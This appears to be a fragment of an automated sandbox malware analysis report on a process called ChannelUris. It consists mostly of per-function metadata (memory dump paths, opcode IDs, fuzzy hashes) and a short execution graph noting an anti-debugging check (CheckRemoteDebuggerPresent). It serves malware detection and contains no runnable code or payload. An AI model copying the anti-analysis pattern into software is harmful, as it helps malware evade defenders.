                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7188699861de2378b5e396bcd3a74143c8a7146590b575fdd53796a054c01721
                                                                                                            • Instruction ID: fab022d7dead3e418886fbe1ab42c5e8c0e3afe029acbfd27beb95cc0b0861ba
                                                                                                            • Opcode Fuzzy Hash: 7188699861de2378b5e396bcd3a74143c8a7146590b575fdd53796a054c01721
                                                                                                            • Instruction Fuzzy Hash: 66E01A74D09208EBC788DFA4D5416ACFBB4AB48204F10C0ED980893341CA355A42DF81
                                                                                                            Function 092B6580 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 51894cf486b88d19311047d10edebc64dbed22f8950ad1216c8c3cb8549c7076
                                                                                                            • Instruction ID: 1cae1ce12ca52ca25584e484d42d55ae904733029eb99af4dff3914a953617ef
                                                                                                            • Opcode Fuzzy Hash: 51894cf486b88d19311047d10edebc64dbed22f8950ad1216c8c3cb8549c7076
                                                                                                            • Instruction Fuzzy Hash: 0FE0EC74D19208DFC754DFB8D9497ACBBF4AB0C311F2041A9D90893281E6715A91CF51
                                                                                                            Function 0983E218 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d936930eea2e7a70b141cd1e6aba4d8bdf6491bf29412a62f55e585c290be0d0
                                                                                                            • Instruction ID: e7ea9a06e9ed6551c355e619737e0055c3134b9de6f963be520b6ee6a41954de
                                                                                                            • Opcode Fuzzy Hash: d936930eea2e7a70b141cd1e6aba4d8bdf6491bf29412a62f55e585c290be0d0
                                                                                                            • Instruction Fuzzy Hash: 96E01274948208DBCB04DFE5D54566CFBB9EB45304F60D19DD80857342CA315E43DF91
                                                                                                            Function 093AE568 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33476d26a84997c87a4d83603b189cd1bef7fb3139a0ebe504c47aef6033d4f0
                                                                                                            • Instruction ID: 98acc440d614f55836d105f9d620eadb551f196ae8851d29e1fa4e0e9fab601e
                                                                                                            • Opcode Fuzzy Hash: 33476d26a84997c87a4d83603b189cd1bef7fb3139a0ebe504c47aef6033d4f0
                                                                                                            • Instruction Fuzzy Hash: AEE09279D0420CFFCB54DFA8E945A9CBBB5EB48300F10C1AAEC5452350D7715A55EF91
                                                                                                            Function 093A5006 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8555e8e5c6a4835f5c13e6a0ad7c4c542f7781b5fd7ccafae54f5866539cf269
                                                                                                            • Instruction ID: 3e62d074db8c700ed845f10ad99349e7e55d7a387c978e2ae0f991822036a0b9
                                                                                                            • Opcode Fuzzy Hash: 8555e8e5c6a4835f5c13e6a0ad7c4c542f7781b5fd7ccafae54f5866539cf269
                                                                                                            • Instruction Fuzzy Hash: 5DF092759042A99FDB68CF10DC48BD8BAB5EF46300F1484D9A509B3250EBB04B85CF40
                                                                                                            Function 093AD858 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 36880bddb73ff674dcd49ebecc94e0a266a43456b0552ba6c59a3c7fceeeb631
                                                                                                            • Instruction ID: 5a5a13a5d0e98bde3f1535b625fb39fcb2412529f8e99cc756ed3a57a2241d37
                                                                                                            • Opcode Fuzzy Hash: 36880bddb73ff674dcd49ebecc94e0a266a43456b0552ba6c59a3c7fceeeb631
                                                                                                            • Instruction Fuzzy Hash: 31E0B6B4E05208EFCB54DFA9D54569DBBF4EB48300F10C1A99818A3340DA345E45DF41
                                                                                                            Function 093ACC90 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d239738ba37617dd3e8ff7d5377f8906d08c647a61a66bfc09ae7fb9d4e7a47a
                                                                                                            • Instruction ID: 1e068105924140cdf391c1047b5999a6c1108d6669f65dc45a6c1be6ccb3b17c
                                                                                                            • Opcode Fuzzy Hash: d239738ba37617dd3e8ff7d5377f8906d08c647a61a66bfc09ae7fb9d4e7a47a
                                                                                                            • Instruction Fuzzy Hash: B8E09274E05308EFCB54EFA9E54969DBBF5EB48301F1081A9D858A3340D7395A42DF81
                                                                                                            Function 092B6878 Relevance: .0, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c1fb33214077aee3931f9cafdb34040a7177cf5f8931a83eb3549c0c50a94fa
                                                                                                            • Instruction ID: ec93ba881b7b5dd0634540892910d3cd8352f8945f289f3706a2aff7795badc8
                                                                                                            • Opcode Fuzzy Hash: 0c1fb33214077aee3931f9cafdb34040a7177cf5f8931a83eb3549c0c50a94fa
                                                                                                            • Instruction Fuzzy Hash: 8FD0C230819208EBC704DFA0D5087ACBBB9A705301F109098840427240D7301D06DB82
                                                                                                            Function 092B242C Relevance: .0, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13d7086de12c73911d407885dfd4dba5f610387e0f0df568f61f55c211226ade
                                                                                                            • Instruction ID: bbdf6f0b5f19494d280fc26a49626e2a94317d8222b521da25768ad4ec4c61ef
                                                                                                            • Opcode Fuzzy Hash: 13d7086de12c73911d407885dfd4dba5f610387e0f0df568f61f55c211226ade
                                                                                                            • Instruction Fuzzy Hash: 4AF04874A046289FCB64CF24D954BCABBB1BF49301F0091EA944DA6740DBB01E81CF00
                                                                                                            Function 092B9B48 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77343d68319ab40cc2de854ef9963a7df7284f2d911ca58376a7b291eeeb045e
                                                                                                            • Instruction ID: 63d5b422791b5343be12e0210c29b6de397fc96d4a7f7ad908808d179d29fe6d
                                                                                                            • Opcode Fuzzy Hash: 77343d68319ab40cc2de854ef9963a7df7284f2d911ca58376a7b291eeeb045e
                                                                                                            • Instruction Fuzzy Hash: EFE01270A0520DEFDB40EFA8D60069DB7B5EB85204F1045ACD909D7701D9356E4197A5
                                                                                                            Function 092B2507 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a565a7c052873fe3738058c29d853248a2f469ee45c48abfe50fdfc4bf835da3
                                                                                                            • Instruction ID: d61affcf63738a1d4b4d21eb3f5c45c28faebb7e63eea5dbc6c74ffaf25f275c
                                                                                                            • Opcode Fuzzy Hash: a565a7c052873fe3738058c29d853248a2f469ee45c48abfe50fdfc4bf835da3
                                                                                                            • Instruction Fuzzy Hash: A1E08C30A6231ACFDB44AF38D5596CA3BF1EB41350F008695C2099B258EF744A868F91
                                                                                                            Function 093AC718 Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82e8d9365f2d4a676649a7f1f45d04a77cb18625555c23a65382506913e9c960
                                                                                                            • Instruction ID: d107840c7b5e5853341bc6b86b4e35fcf8845a1906e30e715d81b69cce091bc1
                                                                                                            • Opcode Fuzzy Hash: 82e8d9365f2d4a676649a7f1f45d04a77cb18625555c23a65382506913e9c960
                                                                                                            • Instruction Fuzzy Hash: 35E0E270D01218EFCB58EFB895452ADBBB5AB04201FA080A9C848A2340EB319A81CF92
                                                                                                            Function 092B71FE Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96d07042050655757a6f0ba80b1547b4f6f6b7d2576a8858959bc447dcf4571d
                                                                                                            • Instruction ID: feba61938c50280e8da963c4017a9d96ad67185c0c7a79e2dc08fa688deed12b
                                                                                                            • Opcode Fuzzy Hash: 96d07042050655757a6f0ba80b1547b4f6f6b7d2576a8858959bc447dcf4571d
                                                                                                            • Instruction Fuzzy Hash: CCE04FB49081298FDB54DF68D6847DD77B2EB95315F0044AAC64AA7B40CF782DC4CF54
                                                                                                            Function 092B28E4 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95992cc5966d1bdb57e0ceb77a91ef458a14e684aed50e27395cb9d3e6b63ed7
                                                                                                            • Instruction ID: e8bc9581a22fd663197778ae916be071bbb674330fe4328dfda63e03b3fa2713
                                                                                                            • Opcode Fuzzy Hash: 95992cc5966d1bdb57e0ceb77a91ef458a14e684aed50e27395cb9d3e6b63ed7
                                                                                                            • Instruction Fuzzy Hash: 92E0C270A2220ADFDF18AF30D549BCA37B4EB44381F0048C4D50C57209EF704E468F91
                                                                                                            Function 092B732D Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d53a54d4d5f410161ee3894ba66769dd82a06946b848c064df6fd6fa01c23ef2
                                                                                                            • Instruction ID: d189db4217f649191a528a4b1a6dc6ad0bc038a4b12e3d8bb28e62ed29f6e2d8
                                                                                                            • Opcode Fuzzy Hash: d53a54d4d5f410161ee3894ba66769dd82a06946b848c064df6fd6fa01c23ef2
                                                                                                            • Instruction Fuzzy Hash: 3CE01A749041288FDB10DF68D95879D7BF2EB89341F008999C58AA3740CB782D829F54
                                                                                                            Function 092B7383 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 757c0b3c68177737e9029c106a67973e83c6d01c28f5493e5bc8713ecb83738d
                                                                                                            • Instruction ID: 6156ad3ffab866360f8e63d7251d695a6333bfeef87d3dc9a7cd6fd3458ec5ce
                                                                                                            • Opcode Fuzzy Hash: 757c0b3c68177737e9029c106a67973e83c6d01c28f5493e5bc8713ecb83738d
                                                                                                            • Instruction Fuzzy Hash: 14E0DF70A04228CFEB10EF24D444BDD77B2EF8A311F10449A8489A3740CF382D81CF25
                                                                                                            Function 092B7A43 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e9f02fb127a809b16478a1069516c49e1ff6d5c947eb04c901284f0c369eabf1
                                                                                                            • Instruction ID: 3e1dc9112e15751654b0b5ad53a6b31320b5b3fab582cacdf1646c383bdfe3ca
                                                                                                            • Opcode Fuzzy Hash: e9f02fb127a809b16478a1069516c49e1ff6d5c947eb04c901284f0c369eabf1
                                                                                                            • Instruction Fuzzy Hash: 29E01A74A041288BDB50DF64DA487DE77B2EB85309F10499B9A0AA3740CF342D81CF54
                                                                                                            Function 092B7254 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0d49f00d81b59c2ea2f6149fae16ec516cefd46068ffc071edd8956dfe06786
                                                                                                            • Instruction ID: fbae989d90303e096f0a0e42cfa664397d3fd05ca020e6da916c03a2df114e20
                                                                                                            • Opcode Fuzzy Hash: b0d49f00d81b59c2ea2f6149fae16ec516cefd46068ffc071edd8956dfe06786
                                                                                                            • Instruction Fuzzy Hash: C5E012B4A041188FDB14DF64D5547DDB7B2EF86301F0044D98A4AA7740CA742D458F51
                                                                                                            Function 092B7578 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d3c8a3436d679f9d795bd1993d290a52dc2eb4af5d7c581a5284cd9ce215229c
                                                                                                            • Instruction ID: 9e668f7bb4031d8747a574c240a97c32407ae07777f4bc840526f3dabd38f0fc
                                                                                                            • Opcode Fuzzy Hash: d3c8a3436d679f9d795bd1993d290a52dc2eb4af5d7c581a5284cd9ce215229c
                                                                                                            • Instruction Fuzzy Hash: 97E012749052188FDB50DF64D99479D77B1FB89315F0005D9D506A7780CE342E85CF21
                                                                                                            Function 04B1F080 Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7449f8ec8e23d0a7588d7a040902051e45fd97574a3e6d059c7b365500959fdd
                                                                                                            • Instruction ID: e6a8b416a38a48ff1d9fdbc54ebccfadb0c61dd9afe6954422785d0e0328b222
                                                                                                            • Opcode Fuzzy Hash: 7449f8ec8e23d0a7588d7a040902051e45fd97574a3e6d059c7b365500959fdd
                                                                                                            • Instruction Fuzzy Hash: CDD05B7090010DEFCB40DFB8E94159DB7F9DB45214B1045A9D608D3300EA317F009751
                                                                                                            Function 092B74B9 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 876c5ca3be75014f5789bb769ad2b7aa33492487a91149e8e113d9fbd60bb04d
                                                                                                            • Instruction ID: 6dcb62944c89136c4ea24d49b49c3e3ea86462c0b3142b4e9f085a93f095ad8b
                                                                                                            • Opcode Fuzzy Hash: 876c5ca3be75014f5789bb769ad2b7aa33492487a91149e8e113d9fbd60bb04d
                                                                                                            • Instruction Fuzzy Hash: C5E0ECB4525118CBDB40CF98E4846DD7BFAFB89351F100416E102E7B84C73868448F15
                                                                                                            Function 093ADBA0 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 88b7d2a5fce154fe44d7b7b78dd8dc214de1c22c556869b3ea782cda8a98fa1a
                                                                                                            • Instruction ID: d2c982ac0c3892d1260b45b835947d8be0c4c6149ec3e559aca2d6f5faf3b82e
                                                                                                            • Opcode Fuzzy Hash: 88b7d2a5fce154fe44d7b7b78dd8dc214de1c22c556869b3ea782cda8a98fa1a
                                                                                                            • Instruction Fuzzy Hash: 5DD05270D0520CEBDB04EFE8D5056ACBBF4AB04200F0080A8880427280EA701E45CF92
                                                                                                            Function 093A7E81 Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 078c25340f0109ae2c2b67553ab4243aeef5538dd17fae4262d9980e9e97ab75
                                                                                                            • Instruction ID: ea459140d6523c3b8a4114a8cb20223b3f2f731f198bb64c97a267725a4db3cf
                                                                                                            • Opcode Fuzzy Hash: 078c25340f0109ae2c2b67553ab4243aeef5538dd17fae4262d9980e9e97ab75
                                                                                                            • Instruction Fuzzy Hash: 8BE01274E052288FCB20CF28CD05BD9B7F0EB0A341F0042D9A948A7280C2B4AE848E40
                                                                                                            Function 0983E670 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2482200764.0000000009820000.00000040.00000800.00020000.00000000.sdmp, Offset: 09820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_9820000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb7b4eece01da5eb95cd4bdfa92d20fd84f25087824522aaf6913305c33a8964
                                                                                                            • Instruction ID: 1cbdb463dd6b63df93b24cb256b969416b0ef97d92ab253628e3be6288a1f83a
                                                                                                            • Opcode Fuzzy Hash: bb7b4eece01da5eb95cd4bdfa92d20fd84f25087824522aaf6913305c33a8964
                                                                                                            • Instruction Fuzzy Hash: 6CC08C3004E608C7C1181695A008370739CD306205F80E40CA10C805233A600421CE92
                                                                                                            Function 093AE848 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481433988.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_93a0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b54ef79374fbbccad2277cb0226872a627a4d82cc11355f71f95ab8053b2ee28
                                                                                                            • Instruction ID: 5d268ba77319b253ee784cb6f3c62835d4e92f29a990558aa62e0c26e97e33d5
                                                                                                            • Opcode Fuzzy Hash: b54ef79374fbbccad2277cb0226872a627a4d82cc11355f71f95ab8053b2ee28
                                                                                                            • Instruction Fuzzy Hash: 30C02B3104E704C3C23417A0700C33073ECC306B21F44780C902C008128E600C41CE72
                                                                                                            Function 04B19C50 Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb46e05a9ae9719ebd723df572d88e5a9b3f5aa9575e4f70aa06d1cf33d9582c
                                                                                                            • Instruction ID: 7b206960c4eb956593525821733de98a728c84d9c8f02027460ce30c0716596d
                                                                                                            • Opcode Fuzzy Hash: eb46e05a9ae9719ebd723df572d88e5a9b3f5aa9575e4f70aa06d1cf33d9582c
                                                                                                            • Instruction Fuzzy Hash: 61C012B004D3C0AFCF038B20A866A943F30BF43210B0A00D3E4848F063E6A02A58CB11
                                                                                                            Function 092BB242 Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f1e101ea932d5efaf5d09fef7c82930deb8389c00d49d20d4a1f84eadacbc20b
                                                                                                            • Instruction ID: 76655195c51e3fca4bf097803c00a256b4a7ff89879dd855b425de573ae6fccc
                                                                                                            • Opcode Fuzzy Hash: f1e101ea932d5efaf5d09fef7c82930deb8389c00d49d20d4a1f84eadacbc20b
                                                                                                            • Instruction Fuzzy Hash: 3FC09BF04486955FDB05D758D50D710BE50FB8D351F1987DD914A4E4D3DBD14450C751
                                                                                                            Function 092B748C Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2481107239.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_92b0000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d65cac43ebba96d8ae66c6faed5b5133bc82aad7bdcb14b361f7cd7e75e406f7
                                                                                                            • Instruction ID: 2775b69b97157f44727941bd0587aa5112fbc44e0aef1d503e4d654a1055f7e2
                                                                                                            • Opcode Fuzzy Hash: d65cac43ebba96d8ae66c6faed5b5133bc82aad7bdcb14b361f7cd7e75e406f7
                                                                                                            • Instruction Fuzzy Hash: 15C08C71008018CFE700BFB9E04C6DD3B3AEB49357F10406AE0029B644CFB5694A9F12
                                                                                                            Function 04B1C28C Relevance: .0, Instructions: 5COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2414996929.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_4b10000_ChannelUris.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f0ccab0083094bc6e733260aa2306aea03573e55310f2a1b479823f6135821ef
                                                                                                            • Instruction ID: b6bf08be539bfff76ea9139b347fff7c4c21df38fde9ecab07ce6c3e5bb12e7f
                                                                                                            • Opcode Fuzzy Hash: f0ccab0083094bc6e733260aa2306aea03573e55310f2a1b479823f6135821ef
                                                                                                            • Instruction Fuzzy Hash: B6B09274D06168CFDB24CF14C414B9CBBB0AB49300F00C4EB8A0FA23A0E73469809E00

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.3%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:17.6%
                                                                                                            Total number of Nodes:17
                                                                                                            Total number of Limit Nodes:1
                                                                                                            execution_graph 28013 6760c70 28014 6760cb2 28013->28014 28016 6760cb9 28013->28016 28015 6760d0a CallWindowProcW 28014->28015 28014->28016 28015->28016 28017 ae70b0 28018 ae70f4 CheckRemoteDebuggerPresent 28017->28018 28019 ae7136 28018->28019 28020 6762e38 28021 6762e60 28020->28021 28024 6762e8c 28020->28024 28022 6762e69 28021->28022 28025 6762324 28021->28025 28026 676232f 28025->28026 28027 6763183 28026->28027 28029 6762340 28026->28029 28027->28024 28030 67631b8 OleInitialize 28029->28030 28031 676321c 28030->28031 28031->28027

                                                                                                            Executed Functions

                                                                                                            Function 06080040 Relevance: 2.8, Instructions: 2752COMMON
                                                                                                            Download Yara Rule
